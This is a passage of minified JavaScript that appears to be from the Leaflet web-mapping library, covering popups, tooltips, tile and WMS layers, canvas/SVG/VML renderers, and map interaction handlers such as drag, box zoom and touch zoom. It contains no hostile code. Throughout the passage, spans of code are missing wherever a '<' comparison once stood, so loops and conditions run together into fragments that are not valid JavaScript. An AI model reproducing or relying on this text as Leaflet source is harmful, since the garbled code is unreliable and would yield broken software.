t=this._url.tagName==="VIDEO",e=this._image=t?this._url:U("video");if(A(e,"leaflet-image-layer"),this._zoomAnimated&&A(e,"leaflet-zoom-animated"),this.options.className&&A(e,this.options.className),e.onselectstart=v,e.onmousemove=v,e.onloadeddata=_(this.fire,this,"load"),t){for(var i=e.getElementsByTagName("source"),n=[],o=0;o0?n:[e.src];return}q(this._url)||(this._url=[this._url]),!this.options.keepAspectRatio&&Object.prototype.hasOwnProperty.call(e.style,"objectFit")&&(e.style.objectFit="fill"),e.autoplay=!!this.options.autoplay,e.loop=!!this.options.loop,e.muted=!!this.options.muted,e.playsInline=!!this.options.playsInline;for(var s=0;so?(e.height=o+"px",A(t,s)):tt(t,s),this._containerWidth=this._container.offsetWidth},_animateZoom:function(t){var e=this._map._latLngToNewLayerPoint(this._latlng,t.zoom,t.center),i=this._getAnchor();nt(this._container,e.add(i))},_adjustPan:function(){if(this.options.autoPan){if(this._map._panAnim&&this._map._panAnim.stop(),this._autopanning){this._autopanning=!1;return}var t=this._map,e=parseInt(ue(this._container,"marginBottom"),10)||0,i=this._container.offsetHeight+e,n=this._containerWidth,o=new E(this._containerLeft,-i-this._containerBottom);o._add(qt(this._container));var s=t.layerPointToContainerPoint(o),r=Z(this.options.autoPanPadding),a=Z(this.options.autoPanPaddingTopLeft||r),u=Z(this.options.autoPanPaddingBottomRight||r),c=t.getSize(),y=0,C=0;s.x+n+u.x>c.x&&(y=s.x+n-c.x+u.x),s.x-y-a.x<0&&(y=s.x-a.x),s.y+i+u.y>c.y&&(C=s.y+i-c.y+u.y),s.y-C-a.y<0&&(C=s.y-a.y),(y||C)&&(this.options.keepInView&&(this._autopanning=!0),t.fire("autopanstart").panBy([y,C]))}},_getAnchor:function(){return Z(this._source&&this._source._getPopupAnchor?this._source._getPopupAnchor():[0,0])}}),$o=function(t,e){return new Fe(t,e)};H.mergeOptions({closePopupOnClick:!0}),H.include({openPopup:function(t,e,i){return this._initOverlay(Fe,t,e,i).openOn(this),this},closePopup:function(t){return t=arguments.length?t:this._popup,t&&t.close(),this}}),Ct.include({bindPopup:function(t,e){return this._popup=this._initOverlay(Fe,this._popup,t,e),this._popupHandlersAdded||(this.on({click:this._openPopup,keypress:this._onKeyPress,remove:this.closePopup,move:this._movePopup}),this._popupHandlersAdded=!0),this},unbindPopup:function(){return this._popup&&(this.off({click:this._openPopup,keypress:this._onKeyPress,remove:this.closePopup,move:this._movePopup}),this._popupHandlersAdded=!1,this._popup=null),this},openPopup:function(t){return this._popup&&(this instanceof It||(this._popup._source=this),this._popup._prepareOpen(t||this._latlng)&&this._popup.openOn(this._map)),this},closePopup:function(){return this._popup&&this._popup.close(),this},togglePopup:function(){return this._popup&&this._popup.toggle(this),this},isPopupOpen:function(){return this._popup?this._popup.isOpen():!1},setPopupContent:function(t){return this._popup&&this._popup.setContent(t),this},getPopup:function(){return this._popup},_openPopup:function(t){if(!(!this._popup||!this._map)){Kt(t);var e=t.layer||t.target;if(this._popup._source===e&&!(e instanceof Vt)){this._map.hasLayer(this._popup)?this.closePopup():this.openPopup(t.latlng);return}this._popup._source=e,this.openPopup(t.latlng)}},_movePopup:function(t){this._popup.setLatLng(t.latlng)},_onKeyPress:function(t){t.originalEvent.keyCode===13&&this._openPopup(t)}});var He=zt.extend({options:{pane:"tooltipPane",offset:[0,0],direction:"auto",permanent:!1,sticky:!1,opacity:.9},onAdd:function(t){zt.prototype.onAdd.call(this,t),this.setOpacity(this.options.opacity),t.fire("tooltipopen",{tooltip:this}),this._source&&(this.addEventParent(this._source),this._source.fire("tooltipopen",{tooltip:this},!0))},onRemove:function(t){zt.prototype.onRemove.call(this,t),t.fire("tooltipclose",{tooltip:this}),this._source&&(this.removeEventParent(this._source),this._source.fire("tooltipclose",{tooltip:this},!0))},getEvents:function(){var t=zt.prototype.getEvents.call(this);return this.options.permanent||(t.preclick=this.close),t},_initLayout:function(){var t="leaflet-tooltip",e=t+" "+(this.options.className||"")+" leaflet-zoom-"+(this._zoomAnimated?"animated":"hide");this._contentNode=this._container=U("div",e),this._container.setAttribute("role","tooltip"),this._container.setAttribute("id","leaflet-tooltip-"+g(this))},_updateLayout:function(){},_adjustPan:function(){},_setPosition:function(t){var e,i,n=this._map,o=this._container,s=n.latLngToContainerPoint(n.getCenter()),r=n.layerPointToContainerPoint(t),a=this.options.direction,u=o.offsetWidth,c=o.offsetHeight,y=Z(this.options.offset),C=this._getAnchor();a==="top"?(e=u/2,i=c):a==="bottom"?(e=u/2,i=0):a==="center"?(e=u/2,i=c/2):a==="right"?(e=0,i=c/2):a==="left"?(e=u,i=c/2):r.xthis.options.maxZoom||in?this._retainParent(o,s,r,n):!1)},_retainChildren:function(t,e,i,n){for(var o=2*t;o<2*t+2;o++)for(var s=2*e;s<2*e+2;s++){var r=new E(o,s);r.z=i+1;var a=this._tileCoordsToKey(r),u=this._tiles[a];if(u&&u.active){u.retain=!0;continue}else u&&u.loaded&&(u.retain=!0);i+1this.options.maxZoom||this.options.minZoom!==void 0&&o1){this._setView(t,i);return}for(var C=o.min.y;C<=o.max.y;C++)for(var N=o.min.x;N<=o.max.x;N++){var _t=new E(N,C);if(_t.z=this._tileZoom,!!this._isValidTile(_t)){var at=this._tiles[this._tileCoordsToKey(_t)];at?at.current=!0:r.push(_t)}}if(r.sort(function(gt,se){return gt.distanceTo(s)-se.distanceTo(s)}),r.length!==0){this._loading||(this._loading=!0,this.fire("loading"));var Lt=document.createDocumentFragment();for(N=0;Ni.max.x)||!e.wrapLat&&(t.yi.max.y))return!1}if(!this.options.bounds)return!0;var n=this._tileCoordsToBounds(t);return it(this.options.bounds).overlaps(n)},_keyToBounds:function(t){return this._tileCoordsToBounds(this._keyToTileCoords(t))},_tileCoordsToNwSe:function(t){var e=this._map,i=this.getTileSize(),n=t.scaleBy(i),o=n.add(i),s=e.unproject(n,t.z),r=e.unproject(o,t.z);return[s,r]},_tileCoordsToBounds:function(t){var e=this._tileCoordsToNwSe(t),i=new vt(e[0],e[1]);return this.options.noWrap||(i=this._map.wrapLatLngBounds(i)),i},_tileCoordsToKey:function(t){return t.x+":"+t.y+":"+t.z},_keyToTileCoords:function(t){var e=t.split(":"),i=new E(+e[0],+e[1]);return i.z=+e[2],i},_removeTile:function(t){var e=this._tiles[t];e&&($(e.el),delete this._tiles[t],this.fire("tileunload",{tile:e.el,coords:this._keyToTileCoords(t)}))},_initTile:function(t){A(t,"leaflet-tile");var e=this.getTileSize();t.style.width=e.x+"px",t.style.height=e.y+"px",t.onselectstart=v,t.onmousemove=v,T.ielt9&&this.options.opacity<1&&Pt(t,this.options.opacity)},_addTile:function(t,e){var i=this._getTilePos(t),n=this._tileCoordsToKey(t),o=this.createTile(this._wrapCoords(t),_(this._tileReady,this,t));this._initTile(o),this.createTile.length<2&&X(_(this._tileReady,this,t,null,o)),nt(o,i),this._tiles[n]={el:o,coords:t,current:!0},e.appendChild(o),this.fire("tileloadstart",{tile:o,coords:t})},_tileReady:function(t,e,i){e&&this.fire("tileerror",{error:e,tile:i,coords:t});var n=this._tileCoordsToKey(t);i=this._tiles[n],i&&(i.loaded=+new Date,this._map._fadeAnimated?(Pt(i.el,0),dt(this._fadeFrame),this._fadeFrame=X(this._updateOpacity,this)):(i.active=!0,this._pruneTiles()),e||(A(i.el,"leaflet-tile-loaded"),this.fire("tileload",{tile:i.el,coords:t})),this._noTilesToLoad()&&(this._loading=!1,this.fire("load"),T.ielt9||!this._map._fadeAnimated?X(this._pruneTiles,this):setTimeout(_(this._pruneTiles,this),250)))},_getTilePos:function(t){return t.scaleBy(this.getTileSize()).subtract(this._level.origin)},_wrapCoords:function(t){var e=new E(this._wrapX?S(t.x,this._wrapX):t.x,this._wrapY?S(t.y,this._wrapY):t.y);return e.z=t.z,e},_pxBoundsToTileRange:function(t){var e=this.getTileSize();return new Q(t.min.unscaleBy(e).floor(),t.max.unscaleBy(e).ceil().subtract([1,1]))},_noTilesToLoad:function(){for(var t in this._tiles)if(!this._tiles[t].loaded)return!1;return!0}});function is(t){return new ve(t)}var oe=ve.extend({options:{minZoom:0,maxZoom:18,subdomains:"abc",errorTileUrl:"",zoomOffset:0,tms:!1,zoomReverse:!1,detectRetina:!1,crossOrigin:!1,referrerPolicy:!1},initialize:function(t,e){this._url=t,e=k(this,e),e.detectRetina&&T.retina&&e.maxZoom>0?(e.tileSize=Math.floor(e.tileSize/2),e.zoomReverse?(e.zoomOffset--,e.minZoom=Math.min(e.maxZoom,e.minZoom+1)):(e.zoomOffset++,e.maxZoom=Math.max(e.minZoom,e.maxZoom-1)),e.minZoom=Math.max(0,e.minZoom)):e.zoomReverse?e.minZoom=Math.min(e.maxZoom,e.minZoom):e.maxZoom=Math.max(e.minZoom,e.maxZoom),typeof e.subdomains=="string"&&(e.subdomains=e.subdomains.split("")),this.on("tileunload",this._onTileRemove)},setUrl:function(t,e){return this._url===t&&e===void 0&&(e=!0),this._url=t,e||this.redraw(),this},createTile:function(t,e){var i=document.createElement("img");return I(i,"load",_(this._tileOnLoad,this,e,i)),I(i,"error",_(this._tileOnError,this,e,i)),(this.options.crossOrigin||this.options.crossOrigin==="")&&(i.crossOrigin=this.options.crossOrigin===!0?"":this.options.crossOrigin),typeof this.options.referrerPolicy=="string"&&(i.referrerPolicy=this.options.referrerPolicy),i.alt="",i.src=this.getTileUrl(t),i},getTileUrl:function(t){var e={r:T.retina?"@2x":"",s:this._getSubdomain(t),x:t.x,y:t.y,z:this._getZoomForUrl()};if(this._map&&!this._map.options.crs.infinite){var i=this._globalTileRange.max.y-t.y;this.options.tms&&(e.y=i),e["-y"]=i}return rt(this._url,l(e,this.options))},_tileOnLoad:function(t,e){T.ielt9?setTimeout(_(t,this,null,e),0):t(null,e)},_tileOnError:function(t,e,i){var n=this.options.errorTileUrl;n&&e.getAttribute("src")!==n&&(e.src=n),t(i,e)},_onTileRemove:function(t){t.tile.onload=null},_getZoomForUrl:function(){var t=this._tileZoom,e=this.options.maxZoom,i=this.options.zoomReverse,n=this.options.zoomOffset;return i&&(t=e-t),t+n},_getSubdomain:function(t){var e=Math.abs(t.x+t.y)%this.options.subdomains.length;return this.options.subdomains[e]},_abortLoading:function(){var t,e;for(t in this._tiles)if(this._tiles[t].coords.z!==this._tileZoom&&(e=this._tiles[t].el,e.onload=v,e.onerror=v,!e.complete)){e.src=G;var i=this._tiles[t].coords;$(e),delete this._tiles[t],this.fire("tileabort",{tile:e,coords:i})}},_removeTile:function(t){var e=this._tiles[t];if(e)return e.el.setAttribute("src",G),ve.prototype._removeTile.call(this,t)},_tileReady:function(t,e,i){if(!(!this._map||i&&i.getAttribute("src")===G))return ve.prototype._tileReady.call(this,t,e,i)}});function Mn(t,e){return new oe(t,e)}var Cn=oe.extend({defaultWmsParams:{service:"WMS",request:"GetMap",layers:"",styles:"",format:"image/jpeg",transparent:!1,version:"1.1.1"},options:{crs:null,uppercase:!1},initialize:function(t,e){this._url=t;var i=l({},this.defaultWmsParams);for(var n in e)n in this.options||(i[n]=e[n]);e=k(this,e);var o=e.detectRetina&&T.retina?2:1,s=this.getTileSize();i.width=s.x*o,i.height=s.y*o,this.wmsParams=i},onAdd:function(t){this._crs=this.options.crs||t.options.crs,this._wmsVersion=parseFloat(this.wmsParams.version);var e=this._wmsVersion>=1.3?"crs":"srs";this.wmsParams[e]=this._crs.code,oe.prototype.onAdd.call(this,t)},getTileUrl:function(t){var e=this._tileCoordsToNwSe(t),i=this._crs,n=pt(i.project(e[0]),i.project(e[1])),o=n.min,s=n.max,r=(this._wmsVersion>=1.3&&this._crs===yn?[o.y,o.x,s.y,s.x]:[o.x,o.y,s.x,s.y]).join(","),a=oe.prototype.getTileUrl.call(this,t);return a+ft(this.wmsParams,a,this.options.uppercase)+(this.options.uppercase?"&BBOX=":"&bbox=")+r},setParams:function(t,e){return l(this.wmsParams,t),e||this.redraw(),this}});function ns(t,e){return new Cn(t,e)}oe.WMS=Cn,Mn.wms=ns;var Nt=Ct.extend({options:{padding:.1},initialize:function(t){k(this,t),g(this),this._layers=this._layers||{}},onAdd:function(){this._container||(this._initContainer(),A(this._container,"leaflet-zoom-animated")),this.getPane().appendChild(this._container),this._update(),this.on("update",this._updatePaths,this)},onRemove:function(){this.off("update",this._updatePaths,this),this._destroyContainer()},getEvents:function(){var t={viewreset:this._reset,zoom:this._onZoom,moveend:this._update,zoomend:this._onZoomEnd};return this._zoomAnimated&&(t.zoomanim=this._onAnimZoom),t},_onAnimZoom:function(t){this._updateTransform(t.center,t.zoom)},_onZoom:function(){this._updateTransform(this._map.getCenter(),this._map.getZoom())},_updateTransform:function(t,e){var i=this._map.getZoomScale(e,this._zoom),n=this._map.getSize().multiplyBy(.5+this.options.padding),o=this._map.project(this._center,e),s=n.multiplyBy(-i).add(o).subtract(this._map._getNewPixelOrigin(t,e));T.any3d?Gt(this._container,s,i):nt(this._container,s)},_reset:function(){this._update(),this._updateTransform(this._center,this._zoom);for(var t in this._layers)this._layers[t]._reset()},_onZoomEnd:function(){for(var t in this._layers)this._layers[t]._project()},_updatePaths:function(){for(var t in this._layers)this._layers[t]._update()},_update:function(){var t=this.options.padding,e=this._map.getSize(),i=this._map.containerPointToLayerPoint(e.multiplyBy(-t)).round();this._bounds=new Q(i,i.add(e.multiplyBy(1+t*2)).round()),this._center=this._map.getCenter(),this._zoom=this._map.getZoom()}}),Sn=Nt.extend({options:{tolerance:0},getEvents:function(){var t=Nt.prototype.getEvents.call(this);return t.viewprereset=this._onViewPreReset,t},_onViewPreReset:function(){this._postponeUpdatePaths=!0},onAdd:function(){Nt.prototype.onAdd.call(this),this._draw()},_initContainer:function(){var t=this._container=document.createElement("canvas");I(t,"mousemove",this._onMouseMove,this),I(t,"click dblclick mousedown mouseup contextmenu",this._onClick,this),I(t,"mouseout",this._handleMouseOut,this),t._leaflet_disable_events=!0,this._ctx=t.getContext("2d")},_destroyContainer:function(){dt(this._redrawRequest),delete this._ctx,$(this._container),K(this._container),delete this._container},_updatePaths:function(){if(!this._postponeUpdatePaths){var t;this._redrawBounds=null;for(var e in this._layers)t=this._layers[e],t._update();this._redraw()}},_update:function(){if(!(this._map._animatingZoom&&this._bounds)){Nt.prototype._update.call(this);var t=this._bounds,e=this._container,i=t.getSize(),n=T.retina?2:1;nt(e,t.min),e.width=n*i.x,e.height=n*i.y,e.style.width=i.x+"px",e.style.height=i.y+"px",T.retina&&this._ctx.scale(2,2),this._ctx.translate(-t.min.x,-t.min.y),this.fire("update")}},_reset:function(){Nt.prototype._reset.call(this),this._postponeUpdatePaths&&(this._postponeUpdatePaths=!1,this._updatePaths())},_initPath:function(t){this._updateDashArray(t),this._layers[g(t)]=t;var e=t._order={layer:t,prev:this._drawLast,next:null};this._drawLast&&(this._drawLast.next=e),this._drawLast=e,this._drawFirst=this._drawFirst||this._drawLast},_addPath:function(t){this._requestRedraw(t)},_removePath:function(t){var e=t._order,i=e.next,n=e.prev;i?i.prev=n:this._drawLast=n,n?n.next=i:this._drawFirst=i,delete t._order,delete this._layers[g(t)],this._requestRedraw(t)},_updatePath:function(t){this._extendRedrawBounds(t),t._project(),t._update(),this._requestRedraw(t)},_updateStyle:function(t){this._updateDashArray(t),this._requestRedraw(t)},_updateDashArray:function(t){if(typeof t.options.dashArray=="string"){var e=t.options.dashArray.split(/[, ]+/),i=[],n,o;for(o=0;o')}}catch{}return function(t){return document.createElement("<"+t+' xmlns="urn:schemas-microsoft.com:vml" class="lvml">')}}(),os={_initContainer:function(){this._container=U("div","leaflet-vml-container")},_update:function(){this._map._animatingZoom||(Nt.prototype._update.call(this),this.fire("update"))},_initPath:function(t){var e=t._container=ge("shape");A(e,"leaflet-vml-shape "+(this.options.className||"")),e.coordsize="1 1",t._path=ge("path"),e.appendChild(t._path),this._updateStyle(t),this._layers[g(t)]=t},_addPath:function(t){var e=t._container;this._container.appendChild(e),t.options.interactive&&t.addInteractiveTarget(e)},_removePath:function(t){var e=t._container;$(e),t.removeInteractiveTarget(e),delete this._layers[g(t)]},_updateStyle:function(t){var e=t._stroke,i=t._fill,n=t.options,o=t._container;o.stroked=!!n.stroke,o.filled=!!n.fill,n.stroke?(e||(e=t._stroke=ge("stroke")),o.appendChild(e),e.weight=n.weight+"px",e.color=n.color,e.opacity=n.opacity,n.dashArray?e.dashStyle=q(n.dashArray)?n.dashArray.join(" "):n.dashArray.replace(/( *, *)/g," "):e.dashStyle="",e.endcap=n.lineCap.replace("butt","flat"),e.joinstyle=n.lineJoin):e&&(o.removeChild(e),t._stroke=null),n.fill?(i||(i=t._fill=ge("fill")),o.appendChild(i),i.color=n.fillColor||n.color,i.opacity=n.fillOpacity):i&&(o.removeChild(i),t._fill=null)},_updateCircle:function(t){var e=t._point.round(),i=Math.round(t._radius),n=Math.round(t._radiusY||i);this._setPath(t,t._empty()?"M0 0":"AL "+e.x+","+e.y+" "+i+","+n+" 0,"+65535*360)},_setPath:function(t,e){t._path.v=e},_bringToFront:function(t){Qt(t._container)},_bringToBack:function(t){$t(t._container)}},We=T.vml?ge:Oi,ye=Nt.extend({_initContainer:function(){this._container=We("svg"),this._container.setAttribute("pointer-events","none"),this._rootGroup=We("g"),this._container.appendChild(this._rootGroup)},_destroyContainer:function(){$(this._container),K(this._container),delete this._container,delete this._rootGroup,delete this._svgSize},_update:function(){if(!(this._map._animatingZoom&&this._bounds)){Nt.prototype._update.call(this);var t=this._bounds,e=t.getSize(),i=this._container;(!this._svgSize||!this._svgSize.equals(e))&&(this._svgSize=e,i.setAttribute("width",e.x),i.setAttribute("height",e.y)),nt(i,t.min),i.setAttribute("viewBox",[t.min.x,t.min.y,e.x,e.y].join(" ")),this.fire("update")}},_initPath:function(t){var e=t._path=We("path");t.options.className&&A(e,t.options.className),t.options.interactive&&A(e,"leaflet-interactive"),this._updateStyle(t),this._layers[g(t)]=t},_addPath:function(t){this._rootGroup||this._initContainer(),this._rootGroup.appendChild(t._path),t.addInteractiveTarget(t._path)},_removePath:function(t){$(t._path),t.removeInteractiveTarget(t._path),delete this._layers[g(t)]},_updatePath:function(t){t._project(),t._update()},_updateStyle:function(t){var e=t._path,i=t.options;e&&(i.stroke?(e.setAttribute("stroke",i.color),e.setAttribute("stroke-opacity",i.opacity),e.setAttribute("stroke-width",i.weight),e.setAttribute("stroke-linecap",i.lineCap),e.setAttribute("stroke-linejoin",i.lineJoin),i.dashArray?e.setAttribute("stroke-dasharray",i.dashArray):e.removeAttribute("stroke-dasharray"),i.dashOffset?e.setAttribute("stroke-dashoffset",i.dashOffset):e.removeAttribute("stroke-dashoffset")):e.setAttribute("stroke","none"),i.fill?(e.setAttribute("fill",i.fillColor||i.color),e.setAttribute("fill-opacity",i.fillOpacity),e.setAttribute("fill-rule",i.fillRule||"evenodd")):e.setAttribute("fill","none"))},_updatePoly:function(t,e){this._setPath(t,Zi(t._parts,e))},_updateCircle:function(t){var e=t._point,i=Math.max(Math.round(t._radius),1),n=Math.max(Math.round(t._radiusY),1)||i,o="a"+i+","+n+" 0 1,0 ",s=t._empty()?"M0 0":"M"+(e.x-i)+","+e.y+o+i*2+",0 "+o+-i*2+",0 ";this._setPath(t,s)},_setPath:function(t,e){t._path.setAttribute("d",e)},_bringToFront:function(t){Qt(t._path)},_bringToBack:function(t){$t(t._path)}});T.vml&&ye.include(os);function En(t){return T.svg||T.vml?new ye(t):null}H.include({getRenderer:function(t){var e=t.options.renderer||this._getPaneRenderer(t.options.pane)||this.options.renderer||this._renderer;return e||(e=this._renderer=this._createRenderer()),this.hasLayer(e)||this.addLayer(e),e},_getPaneRenderer:function(t){if(t==="overlayPane"||t===void 0)return!1;var e=this._paneRenderers[t];return e===void 0&&(e=this._createRenderer({pane:t}),this._paneRenderers[t]=e),e},_createRenderer:function(t){return this.options.preferCanvas&&kn(t)||En(t)}});var zn=ie.extend({initialize:function(t,e){ie.prototype.initialize.call(this,this._boundsToLatLngs(t),e)},setBounds:function(t){return this.setLatLngs(this._boundsToLatLngs(t))},_boundsToLatLngs:function(t){return t=it(t),[t.getSouthWest(),t.getNorthWest(),t.getNorthEast(),t.getSouthEast()]}});function ss(t,e){return new zn(t,e)}ye.create=We,ye.pointsToPath=Zi,Bt.geometryToLayer=Ae,Bt.coordsToLatLng=wi,Bt.coordsToLatLngs=Be,Bt.latLngToCoords=Pi,Bt.latLngsToCoords=Ne,Bt.getFeature=ne,Bt.asFeature=De,H.mergeOptions({boxZoom:!0});var On=Et.extend({initialize:function(t){this._map=t,this._container=t._container,this._pane=t._panes.overlayPane,this._resetStateTimeout=0,t.on("unload",this._destroy,this)},addHooks:function(){I(this._container,"mousedown",this._onMouseDown,this)},removeHooks:function(){K(this._container,"mousedown",this._onMouseDown,this)},moved:function(){return this._moved},_destroy:function(){$(this._pane),delete this._pane},_resetState:function(){this._resetStateTimeout=0,this._moved=!1},_clearDeferredResetState:function(){this._resetStateTimeout!==0&&(clearTimeout(this._resetStateTimeout),this._resetStateTimeout=0)},_onMouseDown:function(t){if(!t.shiftKey||t.which!==1&&t.button!==1)return!1;this._clearDeferredResetState(),this._resetState(),le(),ni(),this._startPoint=this._map.mouseEventToContainerPoint(t),I(document,{contextmenu:Kt,mousemove:this._onMouseMove,mouseup:this._onMouseUp,keydown:this._onKeyDown},this)},_onMouseMove:function(t){this._moved||(this._moved=!0,this._box=U("div","leaflet-zoom-box",this._container),A(this._container,"leaflet-crosshair"),this._map.fire("boxzoomstart")),this._point=this._map.mouseEventToContainerPoint(t);var e=new Q(this._point,this._startPoint),i=e.getSize();nt(this._box,e.min),this._box.style.width=i.x+"px",this._box.style.height=i.y+"px"},_finish:function(){this._moved&&($(this._box),tt(this._container,"leaflet-crosshair")),ce(),oi(),K(document,{contextmenu:Kt,mousemove:this._onMouseMove,mouseup:this._onMouseUp,keydown:this._onKeyDown},this)},_onMouseUp:function(t){if(!(t.which!==1&&t.button!==1)&&(this._finish(),!!this._moved)){this._clearDeferredResetState(),this._resetStateTimeout=setTimeout(_(this._resetState,this),0);var e=new vt(this._map.containerPointToLatLng(this._startPoint),this._map.containerPointToLatLng(this._point));this._map.fitBounds(e).fire("boxzoomend",{boxZoomBounds:e})}},_onKeyDown:function(t){t.keyCode===27&&(this._finish(),this._clearDeferredResetState(),this._resetState())}});H.addInitHook("addHandler","boxZoom",On),H.mergeOptions({doubleClickZoom:!0});var Zn=Et.extend({addHooks:function(){this._map.on("dblclick",this._onDoubleClick,this)},removeHooks:function(){this._map.off("dblclick",this._onDoubleClick,this)},_onDoubleClick:function(t){var e=this._map,i=e.getZoom(),n=e.options.zoomDelta,o=t.originalEvent.shiftKey?i-n:i+n;e.options.doubleClickZoom==="center"?e.setZoom(o):e.setZoomAround(t.containerPoint,o)}});H.addInitHook("addHandler","doubleClickZoom",Zn),H.mergeOptions({dragging:!0,inertia:!0,inertiaDeceleration:3400,inertiaMaxSpeed:1/0,easeLinearity:.2,worldCopyJump:!1,maxBoundsViscosity:0});var In=Et.extend({addHooks:function(){if(!this._draggable){var t=this._map;this._draggable=new Ut(t._mapPane,t._container),this._draggable.on({dragstart:this._onDragStart,drag:this._onDrag,dragend:this._onDragEnd},this),this._draggable.on("predrag",this._onPreDragLimit,this),t.options.worldCopyJump&&(this._draggable.on("predrag",this._onPreDragWrap,this),t.on("zoomend",this._onZoomEnd,this),t.whenReady(this._onZoomEnd,this))}A(this._map._container,"leaflet-grab leaflet-touch-drag"),this._draggable.enable(),this._positions=[],this._times=[]},removeHooks:function(){tt(this._map._container,"leaflet-grab"),tt(this._map._container,"leaflet-touch-drag"),this._draggable.disable()},moved:function(){return this._draggable&&this._draggable._moved},moving:function(){return this._draggable&&this._draggable._moving},_onDragStart:function(){var t=this._map;if(t._stop(),this._map.options.maxBounds&&this._map.options.maxBoundsViscosity){var e=it(this._map.options.maxBounds);this._offsetLimit=pt(this._map.latLngToContainerPoint(e.getNorthWest()).multiplyBy(-1),this._map.latLngToContainerPoint(e.getSouthEast()).multiplyBy(-1).add(this._map.getSize())),this._viscosity=Math.min(1,Math.max(0,this._map.options.maxBoundsViscosity))}else this._offsetLimit=null;t.fire("movestart").fire("dragstart"),t.options.inertia&&(this._positions=[],this._times=[])},_onDrag:function(t){if(this._map.options.inertia){var e=this._lastTime=+new Date,i=this._lastPos=this._draggable._absPos||this._draggable._newPos;this._positions.push(i),this._times.push(e),this._prunePositions(e)}this._map.fire("move",t).fire("drag",t)},_prunePositions:function(t){for(;this._positions.length>1&&t-this._times[0]>50;)this._positions.shift(),this._times.shift()},_onZoomEnd:function(){var t=this._map.getSize().divideBy(2),e=this._map.latLngToLayerPoint([0,0]);this._initialWorldOffset=e.subtract(t).x,this._worldWidth=this._map.getPixelWorldBounds().getSize().x},_viscousLimit:function(t,e){return t-(t-e)*this._viscosity},_onPreDragLimit:function(){if(!(!this._viscosity||!this._offsetLimit)){var t=this._draggable._newPos.subtract(this._draggable._startPos),e=this._offsetLimit;t.xe.max.x&&(t.x=this._viscousLimit(t.x,e.max.x)),t.y>e.max.y&&(t.y=this._viscousLimit(t.y,e.max.y)),this._draggable._newPos=this._draggable._startPos.add(t)}},_onPreDragWrap:function(){var t=this._worldWidth,e=Math.round(t/2),i=this._initialWorldOffset,n=this._draggable._newPos.x,o=(n-e+i)%t+e-i,s=(n+e+i)%t-e-i,r=Math.abs(o+i)0?s:-s))-e;this._delta=0,this._startTime=null,r&&(t.options.scrollWheelZoom==="center"?t.setZoom(e+r):t.setZoomAround(this._lastMousePos,e+r))}});H.addInitHook("addHandler","scrollWheelZoom",Bn);var rs=600;H.mergeOptions({tapHold:T.touchNative&&T.safari&&T.mobile,tapTolerance:15});var Nn=Et.extend({addHooks:function(){I(this._map._container,"touchstart",this._onDown,this)},removeHooks:function(){K(this._map._container,"touchstart",this._onDown,this)},_onDown:function(t){if(clearTimeout(this._holdTimeout),t.touches.length===1){var e=t.touches[0];this._startPos=this._newPos=new E(e.clientX,e.clientY),this._holdTimeout=setTimeout(_(function(){this._cancel(),this._isTapValid()&&(I(document,"touchend",ut),I(document,"touchend touchcancel",this._cancelClickPrevent),this._simulateEvent("contextmenu",e))},this),rs),I(document,"touchend touchcancel contextmenu",this._cancel,this),I(document,"touchmove",this._onMove,this)}},_cancelClickPrevent:function t(){K(document,"touchend",ut),K(document,"touchend touchcancel",t)},_cancel:function(){clearTimeout(this._holdTimeout),K(document,"touchend touchcancel contextmenu",this._cancel,this),K(document,"touchmove",this._onMove,this)},_onMove:function(t){var e=t.touches[0];this._newPos=new E(e.clientX,e.clientY)},_isTapValid:function(){return this._newPos.distanceTo(this._startPos)<=this._map.options.tapTolerance},_simulateEvent:function(t,e){var i=new MouseEvent(t,{bubbles:!0,cancelable:!0,view:window,screenX:e.screenX,screenY:e.screenY,clientX:e.clientX,clientY:e.clientY});i._simulated=!0,e.target.dispatchEvent(i)}});H.addInitHook("addHandler","tapHold",Nn),H.mergeOptions({touchZoom:T.touch,bounceAtZoomLimits:!0});var Dn=Et.extend({addHooks:function(){A(this._map._container,"leaflet-touch-zoom"),I(this._map._container,"touchstart",this._onTouchStart,this)},removeHooks:function(){tt(this._map._container,"leaflet-touch-zoom"),K(this._map._container,"touchstart",this._onTouchStart,this)},_onTouchStart:function(t){var e=this._map;if(!(!t.touches||t.touches.length!==2||e._animatingZoom||this._zooming)){var i=e.mouseEventToContainerPoint(t.touches[0]),n=e.mouseEventToContainerPoint(t.touches[1]);this._centerPoint=e.getSize()._divideBy(2),this._startLatLng=e.containerPointToLatLng(this._centerPoint),e.options.touchZoom!=="center"&&(this._pinchStartLatLng=e.containerPointToLatLng(i.add(n)._divideBy(2))),this._startDist=i.distanceTo(n),this._startZoom=e.getZoom(),this._moved=!1,this._zooming=!0,e._stop(),I(document,"touchmove",this._onTouchMove,this),I(document,"touchend touchcancel",this._onTouchEnd,this),ut(t)}},_onTouchMove:function(t){if(!(!t.touches||t.touches.length!==2||!this._zooming)){var e=this._map,i=e.mouseEventToContainerPoint(t.touches[0]),n=e.mouseEventToContainerPoint(t.touches[1]),o=i.distanceTo(n)/this._startDist;if(this._zoom=e.getScaleZoom(o,this._startZoom),!e.options.bounceAtZoomLimits&&(this._zoome.getMaxZoom()&&o>1)&&(this._zoom=e._limitZoom(this._zoom)),e.options.touchZoom==="center"){if(this._center=this._startLatLng,o===1)return}else{var s=i._add(n)._divideBy(2)._subtract(this._centerPoint);if(o===1&&s.x===0&&s.y===0)return;this._center=e.unproject(e.project(this._pinchStartLatLng,this._zoom).subtract(s),this._zoom)}this._moved||(e._moveStart(!0,!1),this._moved=!0),dt(this._animRequest);var r=_(e._move,e,this._center,this._zoom,{pinch:!0,round:!1},void 0);this._animRequest=X(r,this,!0),ut(t)}},_onTouchEnd:function(){if(!this._moved||!this._zooming){this._zooming=!1;return}this._zooming=!1,dt(this._animRequest),K(document,"touchmove",this._onTouchMove,this),K(document,"touchend 